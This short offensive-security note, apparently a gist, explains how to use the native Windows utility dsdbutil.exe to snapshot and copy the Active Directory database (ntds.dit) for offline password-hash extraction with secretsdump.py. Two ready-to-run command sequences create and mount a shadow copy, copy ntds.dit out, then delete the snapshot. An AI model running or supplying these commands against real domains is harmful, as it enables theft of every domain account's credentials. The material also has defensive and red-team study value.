yet another native AD database extraction utility

dsdbutil.exe

DSDButil
========

- dsdbutil (dsdbutil.exe) is utility for performing maintenance on AD/LDS databases [https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc753151(v%3Dws.11)]
- dsdbutil supports VSS snapshot creation
- dsdbutil can be used to extract the AD database (ntds.dit) for offline analysis (with secretsdump.py)

- Example #1: Using Snapshot GUID obtained from cmd output

dsdbutil.exe "activate instance ntds" "snapshot" "create" "quit" "quit"
dsdbutil.exe "activate instance ntds" "snapshot" "mount {GUID}" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "delete {GUID}" "quit" "quit"

- Example #2: Living dangerously with (assumed) snapshot identifier

dsdbutil.exe "activate instance ntds" "snapshot" "create" "list all" "mount 1" "quit" "quit"
copy c:\[Snap Volume]\windows\ntds\ntds.dit c:\users\administrator\desktop\ntds.dit.bak
dsdbutil.exe "activate instance ntds" "snapshot" "list all" "delete 1" "quit" "quit"

*dsdbutil also supports an interactive mode, which is likely more stable than the examples above.